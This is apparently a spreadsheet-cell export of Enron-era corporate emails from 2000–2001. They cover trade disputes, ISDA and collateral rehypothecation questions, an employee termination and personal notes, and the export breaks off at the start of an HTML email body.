print, or copy any part of this message if you are not the intended_x000D_
recipient. CREDIT SUISSE GROUP and each of its subsidiaries each reserve_x000D_
the right to monitor all e-mail communications through its networks._x000D_
Any_x000D_
views expressed in this message are those of the individual sender,_x000D_
except_x000D_
where the message states otherwise and the sender is authorised to state_x000D_
them to be the views of any such entity._x000D_
Unless otherwise stated, any pricing information given in this message_x000D_
is_x000D_
indicative only, is subject to change and does not constitute an offer_x000D_
to_x000D_
deal at any price quoted._x000D_
Any reference to the terms of executed transactions should be treated as_x000D_
preliminary only and subject to our formal written confirmation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks for having these signed  and sending back copies by courier, as well _x000D_
as signature pages by  fax._x000D_
?_x000D_
Speak with you on  Monday._x000D_
?_x000D_
_x000D_
_x000D_
Jacqueline  Didier _x000D_
Legal and Compliance  Department _x000D_
CREDIT | FIRST _x000D_
SUISSE | BOSTON _x000D_
Phone: 212-325-4129 _x000D_
Fax: 212-325-8282 _x000D_
_x000D_
_x000D_
 - 003680684.DOC_x000D_
 - Didier, Jacqueline.vcf</t>
  </si>
  <si>
    <t>Tue, 12 Jun 2001 10:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>draft organization announcement.</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the draft.  It combines all three announcements into one, with a _x000D_
common format. It reflects a "just the facts" approach.  Let me know if you _x000D_
have changes (or answers to the questions in the text)._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 08:31:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Sept 12 Pinnacle deal</t>
  </si>
  <si>
    <t xml:space="preserve">alrighty then......just let me now what the new deal number is  and i'll close out this dispute......_x000D_
_x000D_
Thank you_x000D_
_x000D_
MP_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Semperger, Cara  _x000D_
Sent:	Wednesday, September 26, 2001 7:05 AM_x000D_
To:	Purcell, Mike_x000D_
Cc:	Salisbury, Holden; Alonso, Tom; Fischer, Mark_x000D_
Subject:	RE: Sept 12 Pinnacle deal_x000D_
_x000D_
I do remember this deal, we were forced to bookout by some a-hole at pinwest because of the disaster and our inability to secure a scheule from DYPMI and Morgan who was upstream of AEP who was scheduling from home (as was I).  Tom  did the deal with Pinwest our buy for $40, and I did the deal with DYPMI our sale at Index.  I told the SW guys about this the following day, and in the mayhem, the deals probably did not get put in.  Holden and Tom and Mark were all aware of this at the time, and one of them may have also modified our deal with DYPMI._x000D_
_x000D_
They can throw those deals in, or I can.  Just let me know._x000D_
_x000D_
Cara_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Purcell, Mike  _x000D_
Sent:	Tuesday, September 25, 2001 4:35 PM_x000D_
To:	Semperger, Cara_x000D_
Subject:	Sept 12 Pinnacle deal_x000D_
_x000D_
Cara,_x000D_
_x000D_
I have a dispute  from Pinnacle West for Sept 12 at $40.  I've checked the sheets and the deal is in the sheet, but there is no deal number.  This leads me to believe that there isn't a deal in Enpower.  The deal is PV HV and Staci remembers the problem.    _x000D_
_x000D_
Let me know when we can talk about this_x000D_
_x000D_
 thanks_x000D_
_x000D_
_x000D_
Mike P. Purcell_x000D_
Settlements Coordinator_x000D_
Volume Management-Portland_x000D_
503-464-8297_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 08:05:59 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Trans Pecos</t>
  </si>
  <si>
    <t xml:space="preserve">Jan, would you make 5 copies of the power point slide.  I'll print out the word documents._x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Wednesday, January 23, 2002 4:05 PM_x000D_
To:	Howard, Kevin A._x000D_
Cc:	Harris, Steven; McConnell, Mark_x000D_
Subject:	Trans Pecos_x000D_
_x000D_
Kevin, _x000D_
_x000D_
Per your request, here is some basic information on Trans Pecos.  Please let us know if you need additional information or prefer it in a different format._x000D_
_x000D_
_x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
_x000D_
   _x000D_
                                                     _x000D_
_x000D_
_x000D_
              </t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 03:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.lambert@enron.com'})</t>
  </si>
  <si>
    <t>Please see below.  Can you help them with their on-line questions?_x000D_
_x000D_
Thx_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
----- Forwarded by Debra Perlingiere/HOU/ECT on 03/27/2001 11:39 AM -----_x000D_
_x000D_
	"McGilloway, Vangie" &lt;Vangie.McGilloway@powersrc.com&gt;_x000D_
	03/23/2001 10:13 AM_x000D_
		 _x000D_
		 To: "'Debra.Perlingiere@enron.com'" &lt;Debra.Perlingiere@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: Agreements_x000D_
_x000D_
_x000D_
Good Morning Debra - I have attached a revised copy of the GISB Agreement_x000D_
and Special Provisions for your review and consideration.   I anticipate_x000D_
completing the review of the Master Agreement form and submitting comments_x000D_
to you by Monday._x000D_
_x000D_
In addition, I received feedback from our Gas Desk that the access to the_x000D_
Gas segment of Enron On-Line was cut off to CPS --- do you know who would_x000D_
handle this at Enron that we can speak to?  Greatly appreciate your prompt_x000D_
feedback to this inquiry._x000D_
_x000D_
I look forward to your feedback on the GISB._x000D_
_x000D_
Regards,_x000D_
Vangie McGilloway_x000D_
Constellation Power Source, Inc. ("CPS")_x000D_
111 Market Place_x000D_
Ste 500_x000D_
Baltimore,MD 21202_x000D_
_x000D_
Phone 410-468-3798_x000D_
Fax 410-468-3499_x000D_
Email vangie.mcgilloway@powersrc.com_x000D_
_x000D_
PS- Were you having  phone system problems this morning?   Myself and Credit_x000D_
were calling in and none of the calls rolled into voice mail (?)._x000D_
_x000D_
-----Original Message-----_x000D_
From: Debra.Perlingiere@enron.com [mailto:Debra.Perlingiere@enron.com]_x000D_
Sent: Thursday, March 01, 2001 4:30 PM_x000D_
To: vangie.mcgilloway@powersrc.com_x000D_
Subject: Agreements_x000D_
_x000D_
_x000D_
Further to our conversation,  please see attached  sample agreements._x000D_
Upon your review, please give me a call to discuss any questionsand or_x000D_
issues you may have regarding this matter._x000D_
_x000D_
(See attached file: Constellation Power (GISB draft).doc)(See attached_x000D_
file: Sam3102.doc)_x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
_x000D_
 - ENRON-CPS (GISB rev1).doc</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 14:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ISDA(s) with Mitsui Corp.</t>
  </si>
  <si>
    <t>With Mitsui, could we have one ISDA master signed by all affilaites or would we have to do separate masters with a master netting agreement? Your thoughts?_x000D_
----- Forwarded by Alan Aronowitz/HOU/ECT on 05/31/2001 11:53 AM -----_x000D_
_x000D_
_x000D_
	Jane McBride@ENRON 05/30/2001 09:45 PM 	  To: Alan Aronowitz/HOU/ECT@ECT  cc:   Subject: Re: ISDA(s) with Mitsui Corp. 	_x000D_
_x000D_
_x000D_
Thanks for the help Alan.  Moving forward though, if it turns out that London and/or Singapore are negotiating ISDAs with Mitsui (as we think they are), what do we do about Mitsui's concern that it doesn't want to have separate ISDAs with separate Enron entities.  _x000D_
_x000D_
What is Enron's usual approach to this I wonder.  Seems to me that from the customer's perspective, this makes sense.  I wonder what sort of internal issues this raises though.  _x000D_
_x000D_
Lets talk tomorrow morning._x000D_
_x000D_
Jane_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Alan Aronowitz@ECT 2001/05/30 23:46 	  To: Nony Flores/HOU/ECT@ECT  cc: Edmund Cooper/LON/ECT@ECT, Jane McBride/AP/Enron@Enron, Laurie Mayer/HOU/ECT@ECT, Matthias Lee/SIN/ECT@ECT, Matthias Lee/SIN/ECT@ECT  Subject: Re: ISDA(s) with Mitsui Corp. 	_x000D_
_x000D_
_x000D_
I think Matt Lee may be negotiating one with Mitsui, but I'm not absolutely sure._x000D_
_x000D_
Matt: Could you confirm? Thanks._x000D_
_x000D_
Alan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Nony Flores 05/30/2001 09:44 AM 	   To: Matthias Lee/SIN/ECT@ECT, Edmund Cooper/LON/ECT@ECT  cc: Laurie Mayer/HOU/ECT@ECT, Jane McBride/AP/Enron@Enron, Alan Aronowitz/HOU/ECT@ECT  Subject: Re: ISDA(s) with Mitsui Corp.	_x000D_
_x000D_
_x000D_
Matt/Edmund,_x000D_
_x000D_
Laurie and I are trying to help Jane determine if an ISDA with Mitsui Corp. has been negotiated by London and Singapore.  Tana Jones has checked the Financial Trading Agreements database and found no records of an ISDA with Mitsui.  Do you by any chance no if such agreement has been negotiated and perhaps is waiting to be entered into the database?  If an ISDA does exist with Mitsui, would you be so kind to contact Jane directly with details, etc._x000D_
_x000D_
Thanks and regards,_x000D_
_x000D_
Nony_x000D_
----- Forwarded by Nony Flores/HOU/ECT on 05/30/2001 09:43 AM -----_x000D_
_x000D_
_x000D_
	Laurie Mayer 05/30/2001 08:47 AM 	   To: Jane McBride/AP/Enron@Enron  cc: Alan Aronowitz/HOU/ECT@ECT, Nony Flores/HOU/ECT@ECT  Subject: Re: ISDA(s) with Mitsui Corp.	_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Laurie Mayer/HOU/ECT on 05/30/2001 08:45 AM -----_x000D_
_x000D_
_x000D_
	Tana Jones 05/30/2001 08:29 AM 	  To: Laurie Mayer/HOU/ECT@ECT  cc:   Subject: Re: ISDA(s) with Mitsui Corp. 	_x000D_
_x000D_
_x000D_
No ISDA for Mitsui Corp.  Below is the link which should enable you view access to the Financial Trading Agreement Database.  You can forward this email with the link to any member of your team and they will then have the link which will get them access to the database._x000D_
_x000D_
Link --&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Laurie Mayer 05/30/2001 08:26 AM 	   To: Tana Jones/HOU/ECT@ECT  cc: Alan Aronowitz/HOU/ECT@ECT, Nony Flores/HOU/ECT@ECT  Subject: ISDA(s) with Mitsui Corp.	_x000D_
_x000D_
_x000D_
Tana, would you be able to check on Mitsui Corp. ISDAs for us?  Thanks.  If I can access the database please let me know._x000D_
Laurie_x000D_
----- Forwarded by Laurie Mayer/HOU/ECT on 05/30/2001 08:24 AM -----_x000D_
_x000D_
_x000D_
	Jane McBride@ENRON 05/29/2001 08:56 PM 	   To: Nony Flores/HOU/ECT@ECT, Laurie Mayer/HOU/ECT@ECT, Alan Aronowitz/HOU/ECT@ECT  cc:   Subject: ISDA(s) with Mitsui Corp.	_x000D_
_x000D_
_x000D_
Above company has approached us re an ISDA with them, they have also told us that they have been negotiating ISDAs with Enron London and Enron Singapore for some time._x000D_
_x000D_
**************_x000D_
_x000D_
Laurie/Nony,_x000D_
_x000D_
I wonder if you can find out for me from the data base, what the status is with Mitsui Corp. ISDAs re all Enron companies?  _x000D_
_x000D_
***************_x000D_
_x000D_
Alan,_x000D_
_x000D_
Mitsui Corp has hinted that it doesn't want to have separate ISDAs with separate Enron entities.  What is Enron's usual approach to this I wonder.  Seems to me that from the customer's perspective, this makes sense.  I wonder what sort of internal issues this raises though._x000D_
_x000D_
**********************_x000D_
_x000D_
Thanks all._x000D_
_x000D_
Jane_x000D_
_x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;_x000D_
&lt;Embedded StdOleLink&gt;_x000D_
&lt;Embedded StdOleLink&gt;_x000D_
&lt;Embedded StdOleLink&gt;</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 06:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.davis@enron.com', 'marilyn.colbert@enron.com', 'janie.aguayo@enron.com', 'brad.schneider@enron.com', 'melissa.murphy@enron.com', 'brent.hendry@enron.com', 'william.bradford@enron.com', 'amber.ebow@enron.com', 'lisa.lees@enron.com', 'tanya.rohauer@enron.com', 'susan.bailey@enron.com', 'mary.gosnell@enron.com', 'gordon.heaney@enron.com', 'wendi.lebrocq@enron.com', 'scott.tackett@enron.com', 'brant.reves@enron.com', 'jason.williams@enron.com', 'dale.neuner@enron.com', 'laurel.adams@enron.com', 'david.dupre@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'diane.ellstrom@enron.com', 'dianne.seib@enron.com', 'stephanie.panus@enron.com', 'cheryl.johnson@enron.com', 'mark.taylor@enron.com', 'carrie.southard@enron.com', 'celeste.cisneros@enron.com', 'adnan.patel@enron.com', 'anthony.campos@enron.com', 'bill.hare@enron.com', 'sara.shackleton@enron.com', 'diane.anderson@enron.com', 'lesli.campbell@enron.com', 'john.suttle@enron.com', 'jason.moore@enron.com', 'debbie.brackett@enron.com', 'samuel.schott@enron.com', 'lynn.shivers@enron.com', 'tiffany.williams@enron.com', 'veronica.espinoza@enron.com', 'tana.jones@enron.com', 'georgi.landau@enron.com', 'tracy.ngo@enron.com', 'carol.clair@enron.com', 'karen.lambert@enron.com', 'stacey.richardson@enron.com', 'paul.radous@enron.com', 'robert.bruce@enron.com', 'leslie.reeves@enron.com', 'derek.bailey@enron.com', 'samantha.boyd@enron.com', 'cheryl.nelson@enron.com', 'mary.cook@enron.com', 'kevin.meredith@enron.com', 'bob.bowen@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Midcoast - ASSIGNMENT</t>
  </si>
  <si>
    <t>We have received and executed Assignment and Assumption Agreement effective _x000D_
as of February 1, 2001, by and among Midcoast Energy Resources, Inc., _x000D_
Midcoast Marketing, Inc. and Enron North America Corp., whereby Midcoast _x000D_
Energy Resources, Inc. assigned its transactions to Midcoast Marketing, Inc._x000D_
_x000D_
Copies will be distributed._x000D_
_x000D_
Samantha M. Boyd_x000D_
Sr. Legal Specialist_x000D_
Enron North America, Corp._x000D_
1400 Smith, EB3802A_x000D_
Houston, TX  77002_x000D_
Phone:  (713) 853-9188_x000D_
Fax:  (713) 646-3490_x000D_
email:  samantha.boyd@enron.com</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 03:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'soma.ghosh@enron.com'})</t>
  </si>
  <si>
    <t>Rehypothecation of securities</t>
  </si>
  <si>
    <t>Sara,_x000D_
_x000D_
I have already had a brief discussion with Tana on some of the points below &amp; _x000D_
would appreciate your feedback and clarification on some specific issues._x000D_
_x000D_
We are currently looking at ability of Enron to rehypothecate securities _x000D_
(principally T-bills) received as collateral. _x000D_
_x000D_
Clearly the ability to rehypothecate securities that we hold can provide _x000D_
significant benefits. The free up of funds that are being used to post cash _x000D_
collateral to counterparties increases our B/S liquidity &amp; reduces the total _x000D_
cost of borrowing associated with posting cash._x000D_
_x000D_
We are reviewing the use rehypothecation of all securities posting for all _x000D_
counterparties. Clement is in the process of executing a domestic custody _x000D_
agreement with Chase Manhatten Bank which will facilitate rehypothecation._x000D_
_x000D_
More specifically we are looking at the ability to rehypothecate collateral _x000D_
related to the most recent Mahonia pre-pay structure (very similar to Alberta _x000D_
pre-pay). _x000D_
The collateral arrangement within Mahonia provides for back to back transfer _x000D_
of collateral right through the structure. This results in a net zero cash _x000D_
position if all parties post cash. However if Enron receives securities (from _x000D_
Chase) that we cannot reassign (to Mahonia - an SPE), the cash collateral _x000D_
calls we are seeing are in the region of $600mm (approx. $42mm/yr in interest _x000D_
expense to Enron). _x000D_
_x000D_
In the past Chase have interchangeably used securities &amp; cash. They are _x000D_
currently posting cash, however they intend to post securities going forward _x000D_
for this specific deal._x000D_
_x000D_
The most pressing issues going forward:  _x000D_
Does the existing Chase ISDA permit rehypothecation of securities. We are _x000D_
looking at this. If it does not, then we will need to negotiate an amendment _x000D_
to the credit support annex. _x000D_
Accounting treatment - there are issues around the accounting treatment for _x000D_
rehypothecation under the Mahonia transaction, principally relating to the _x000D_
acceptability of the same securities posted by Chase being posted  to Mahonia _x000D_
SPE (Chase equity in SPE), thus linking all the swaps &amp; potentially bringing _x000D_
the pre-pay back on B/S._x000D_
We need to justify that we can rehypothecate Chase securities posted within _x000D_
the structure. AA's key point is that linkage occurs as the securities posted _x000D_
are most likely to be registered to Chase &amp;  these are then posted back to _x000D_
Mahonia SPE with Chase equity._x000D_
_x000D_
Our case to support the use of Chase securities within the Mahonia pre-pay _x000D_
structure relates to:_x000D_
T-bills are highly liquid instruments &amp; effectively cash equivalent_x000D_
Securities posted by banks are typically registered to a street name ie a _x000D_
brokerage house (ie not registered to Chase), if there is no physical _x000D_
delivery. We are verifying that this is the case with the securities posted _x000D_
by Chase. _x000D_
Market standard contractual terms permit use of these posted securities _x000D_
_x000D_
Re the last point, I have looked at our the standard ISDA credit support _x000D_
annexe para. 6 (c) relating to Use of Posted Collateral, section (i). It _x000D_
appears to say that regardless of a default occurring, the Secured Party _x000D_
(Enron) has the right to "sell, pledge, rehypothecate, assign, invest, use, _x000D_
commingle or otherwise dipose of, or otherwise use in its business any Posted _x000D_
Collateral it holds............." Please confirm that that I have not _x000D_
misinterpreted this or missed out relevant exclusions _x000D_
- Cris, this standard ISDA language should further support our case to AA?._x000D_
_x000D_
In addition, I would like to clarify ownership &amp; title to securities that are _x000D_
rehypothecated in the event of default if a) Enron receives securities that _x000D_
are then rehypothecated &amp; Enron defaults b) the third party receiving _x000D_
rehypothecated securities defaults_x000D_
_x000D_
We are aiming to have the Domestic Custody Agreement executed within the next _x000D_
10 days, &amp; we would like to be in a position to assign securities posted to _x000D_
us shortly thereafter for the Mahonia deal._x000D_
_x000D_
Outside of the Mahonia transaction, there is currently an additional $65mm _x000D_
approx. in securities being posted to us by our counterparties. Going forward _x000D_
we will:_x000D_
Establish who are the counterparties where we have existing collateral _x000D_
agreements that permit rehypotheaction of securities. _x000D_
If we are receiving securities from CP where we are not permitted to _x000D_
rehypothecate, we intend to amend the ISDA._x000D_
_x000D_
I would very much appreciate you response on use of posted collateral &amp; _x000D_
ownership &amp; title to securities in the event of default._x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Soma</t>
  </si>
  <si>
    <t>Fri, 4 Aug 2000 04:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wsnyder@saylid.com'})</t>
  </si>
  <si>
    <t>Re: Golf Tournament Reminder - The Shit List</t>
  </si>
  <si>
    <t>I am not bailing.  Sorry to be so tardy with the check.  Will sending the=_x000D_
=20_x000D_
check directly.  Until then you will have to extend me a friendly loan.   N=_x000D_
ow=20_x000D_
that were are about to be family, its time you really go to know Sharon's=_x000D_
=20_x000D_
deadbeat brother.  I will be moving in shortly after the wedding.    Hope=_x000D_
=20_x000D_
things are going well!  See ya soon._x000D_
_x000D_
_x000D_
_x000D_
=09Will Snyder &lt;wsnyder@saylid.com&gt;_x000D_
=0908/04/2000 10:15 AM_x000D_
=09=09=20_x000D_
=09=09 To: "'Scott Sherer (E-mail)'" &lt;hsherer@earthlink.net&gt;, "'Bill Miller=_x000D_
=20_x000D_
(E-mail)'" &lt;bmiller@hfflp.com&gt;, "'John Tatum (E-mail)'"=20_x000D_
&lt;jtatum@genescosports.com&gt;, "'gerald.nemec@enron.com'"=20_x000D_
&lt;gerald.nemec@enron.com&gt;, "'Fred Vehon (E-mail)'" &lt;fvehon@dillonserv.com&gt;,=_x000D_
=20_x000D_
"'James Esquivel (E-mail)'" &lt;james_esquivel@equityoffice.com&gt;, "'Paul Harmo=_x000D_
n=20_x000D_
(E-mail)'" &lt;pharmon@henrysmiller.com&gt;, "'Jay Thomson (E-mail)'"=20_x000D_
&lt;jthomson@mofo.com&gt;, "'barker358@aol.com'" &lt;barker358@aol.com&gt;,=20_x000D_
"'marcameron@aol.com'" &lt;marcameron@aol.com&gt;, "'Lance Jones (E-mail)'"=20_x000D_
&lt;ljones@scomaha.com&gt;, "'Michael Cooper (E-mail)'"=20_x000D_
&lt;mcooper@heritage-title.com&gt;, "'tdmatula@hhlaw.com'" &lt;tdmatula@hhlaw.com&gt;,=_x000D_
=20_x000D_
"Doug Roach (E-mail)" &lt;jdrdallas@webpc.dellnet.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Golf Tournament Reminder - The Shit List_x000D_
_x000D_
_x000D_
I'm now in the pinch I expected to be in.  I've already got 16 checks in th=_x000D_
e_x000D_
barn, but I'm missing yours.  I'm going to go ahead and put all of your_x000D_
non-refundable green fees on my credit card since I haven't received your_x000D_
checks.  The pro will be calling me any minute now wanting the final number_x000D_
of players, along with my credit card number.  So let me know immediately i=_x000D_
f_x000D_
you're bailin' out.  If any of you have already sent them and, for some_x000D_
reason, I haven't gotten them, please disregard this message and the harsh_x000D_
tone I'm using (if you can hear my tone over the Internet).  If any of you_x000D_
back out, you'll be sticking me with $48.  That will be four less Mai Tais_x000D_
for Sharon and me in Hawaii.  Please send your *$%#@! checks! Here's the?me=_x000D_
ssage I sent out about a month ago, in case you forgot:??Twenty-nine of you=_x000D_
 have said you want to play and I've got three or four?guys on the bubble t=_x000D_
hat haven't received permission to play from their wives?or girlfriends.  R=_x000D_
egardless, I reserved tee times for seven foursomes with?the first group go=_x000D_
ing at 8:32 a.m. on Friday morning and the last at about?9:20 a.m. (eight m=_x000D_
inutes between each group).  I'm sure we can squeeze in?another group when =_x000D_
the numbers round out.  I've put down an initial deposit?of $112 ($4 a head=_x000D_
) that is only refundable for merchandise in the golf shop?or range balls (=_x000D_
don't ask me why, but that's in the contract).  In addition,?I need checks =_x000D_
from each of you for $48.00 by Aug. 1 (green fee, half a cart,?and $4 depos=_x000D_
it).  Please send them to 3235 Cole Ave. #15, Dallas, 75204.  I?need to giv=_x000D_
e the pro a final number and pull the trigger on the full deposit?(putting =_x000D_
the remaining $44 per player on my credit card) by Aug. 3.  Your?check will=_x000D_
 reserve your spot and will enable me to get firm commitments from?everybod=_x000D_
y.  It will also enable me to round out the numbers and put you in?your fou=_x000D_
rsomes.  Thanks; looking forward to it.???William S. Snyder?SAYLES, LIDJI &amp;=_x000D_
 WERBNER??Confidentiality Notice: This email is not encrypted. For informat=_x000D_
ion on?secure, encrypted communication with the firm, visit the Secure Area=_x000D_
 of our?website at http://www.saylid.com.  This email is, however, confiden=_x000D_
tial and?may be privileged; it is for the sole use of the named and intende=_x000D_
d?recipient.  Any review or distribution by others is strictly prohibited a=_x000D_
nd?may be illegal.  If you are not the intended recipient, please delete al=_x000D_
l?copies received and notify Sayles, Lidji &amp; Werbner, A Professional?Corpor=_x000D_
ation.??</t>
  </si>
  <si>
    <t>Mon, 1 May 2000 09:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Hi!</t>
  </si>
  <si>
    <t xml:space="preserve">Glad you sent a note - as crazy as life is at our house right now, I did not _x000D_
get the message from Tammy.  Lots of catch up in the office last week, which _x000D_
will continue this week.  I think that Chris is home by now, and I am sure _x000D_
that you and Erica are glad to have the additional company.  We are starting _x000D_
to talk birthday with Meagan now.  I will get back with you in a couple of _x000D_
days after Meg and I have gone through the JA catalogue.  Thanks for asking.  _x000D_
--Sally _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"White, Cara" &lt;CWhite@texas.usta.com&gt; on 05/01/2000 04:35:43 PM_x000D_
To: "'sally.beck@enron.com'" &lt;sally.beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Hi!_x000D_
_x000D_
_x000D_
Hi, Sal.   Just checking in with you.  I called Friday and talked with_x000D_
Tammy; I wasn't sure if you'd get the message.  Have you had a chance to_x000D_
comb through the James Avery catalogue (or think of any other ideas?) for_x000D_
Meagan's birthday?   Hope you're well.   E-mail back when you can!   Love,_x000D_
C. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 03:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eke@aelaw.com'})</t>
  </si>
  <si>
    <t>Re: Conference Call Cancelled</t>
  </si>
  <si>
    <t>we're all scrambling about next week..._x000D_
_x000D_
Jeff.Dasovich@enron.com wrote:_x000D_
_x000D_
&gt; Edison doesn't want to play?</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 07:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Termination of David Merrill</t>
  </si>
  <si>
    <t xml:space="preserve">Mark - Does this have any budget implications?  We have an automatic _x000D_
allocation to EBS in the 2001 budget which I'll assume remains the same _x000D_
unless you tell me otherwise._x000D_
_x000D_
_x000D_
_x000D_
	Mark Schroeder@ECT_x000D_
	01/05/01 06:42 AM_x000D_
		 _x000D_
		 To: Lilian Low/SIN/ECT@ECT, Michelle Hargrave/HOU/ECT@ECT_x000D_
		 cc: Steven J Kean/NA/Enron@Enron, Kristina Mordaunt/Enron _x000D_
Communications@Enron Communications, Elizabeth Linnell/NA/Enron@Enron, Jim _x000D_
Fallon/Enron Communications@Enron Communications, Roger Estrada/Enron _x000D_
Communications@Enron Communications, Anthony Duenner/Enron _x000D_
Communications@Enron Communications, Jan Haizmann/LON/ECT@ECT_x000D_
		 Subject: Termination of David Merrill_x000D_
_x000D_
David responded to my e-mail today, asking him to call me on Monday.  He _x000D_
suspected bad news.  I told him he was terminated.  He is expecting to meet _x000D_
Lilian on Monday, with her providing the paperwork.  I have told him, per my _x000D_
conversation with Lilian, that he should direct questions regarding COBRA, _x000D_
etc., to Michelle in Houston, as Lilian eschewed familiarity with some of _x000D_
these nuances of US employment law.  We had a 30 minute conversation, he had _x000D_
lots of question, I have taken copious notes in the event of any subsequent _x000D_
legal issue arising (I do not expect any based on my conversation).  He was _x000D_
quite surprised/shocked.  He asked about work in train.  I asked him to do a _x000D_
list on Monday of projects in motion, with a list of contacts, e.g., law _x000D_
firms/consultants, which he will do (Lilian - not sure what usual practice _x000D_
is, but David wants to leave on a positive note, so he wants to leave his _x000D_
work in progress in good shape; therefore, please accommodate him so that he _x000D_
may at least complete these tasks on Monday, i.e., do not show him the door _x000D_
at 10 a.m., thanks).  I said I would have to get out there to pick it up, _x000D_
without mentioning that Kristina and I have discussed plans to meet in _x000D_
Singapore very soon to resolve staffing/resourcing to support EBS Asia.  _x000D_
Please let me know if you need more or have any questions._x000D_
_x000D_
Lilian - please arrange for the Singapore switchboard, as of Tuesday a.m., to _x000D_
indicate that David is no longer at Enron, and to redirect any business calls _x000D_
to David, to Jan Haizmann or to me, as we will cover the regulatory _x000D_
requirements until a replacement is found.  Jan's number is 44-207-783-4474, _x000D_
you have my number.  The time zone difference is unfortunate, but this will _x000D_
have to suffice for now, and in this way Jan and I can attempt to get our _x000D_
hands around any issues hanging out there with regulators or consultants.   _x000D_
thanks  mcs_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 07:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: IHI Arbitration: PRIVILEGED AND CONFIDENTIAL ATTORNEY CLIENT_x000D_
 COMMUNICATION</t>
  </si>
  <si>
    <t xml:space="preserve">That all depends on your definition of the word"job." It was actually _x000D_
anticlimactic---Mark told Bob he needed to stick around on some of the old EI _x000D_
litigation, a fact we already knew. Are you at the Sempra deposition. how is _x000D_
it going?_x000D_
_x000D_
_x000D_
_x000D_
	Gail Brownfeld/ENRON@enronXgate_x000D_
	03/07/2001 03:06 PM_x000D_
		 _x000D_
		 To: Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: RE: IHI Arbitration: PRIVILEGED AND CONFIDENTIAL ATTORNEY CLIENT _x000D_
COMMUNICATION_x000D_
_x000D_
 He keeps saying that he "needs" the $15 million.  Maybe it's a budget thing. _x000D_
I think he really just wants to renegotiate the deal.  I don't think he _x000D_
thinks that IHI has the money to pay us back.  _x000D_
 What happened at the meeting on Monday with Mark?  Do I still have a job? _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Sanders, Richard  _x000D_
Sent: Wednesday, March 07, 2001 3:02 PM_x000D_
To: Brownfeld, Gail_x000D_
Subject: RE: IHI Arbitration: PRIVILEGED AND CONFIDENTIAL ATTORNEY CLIENT _x000D_
COMMUNICATION_x000D_
_x000D_
Thanks. I have no idea why Enerson is being so panicky._x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Jul 2001 14:34:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'m..taylor@enron.com'})</t>
  </si>
  <si>
    <t>Mtg w/Former Sec. of Energy, Bill Richardson w/Ken Lay &amp; Kean</t>
  </si>
  <si>
    <t>see desk file</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 10:00:06 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            _x000D_
&lt;HTML&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      _x000D_
&lt;TITLE&gt;Gas Indices - IntercontentalExchange&lt;/TITLE&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
&lt;BODY&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      _x000D_
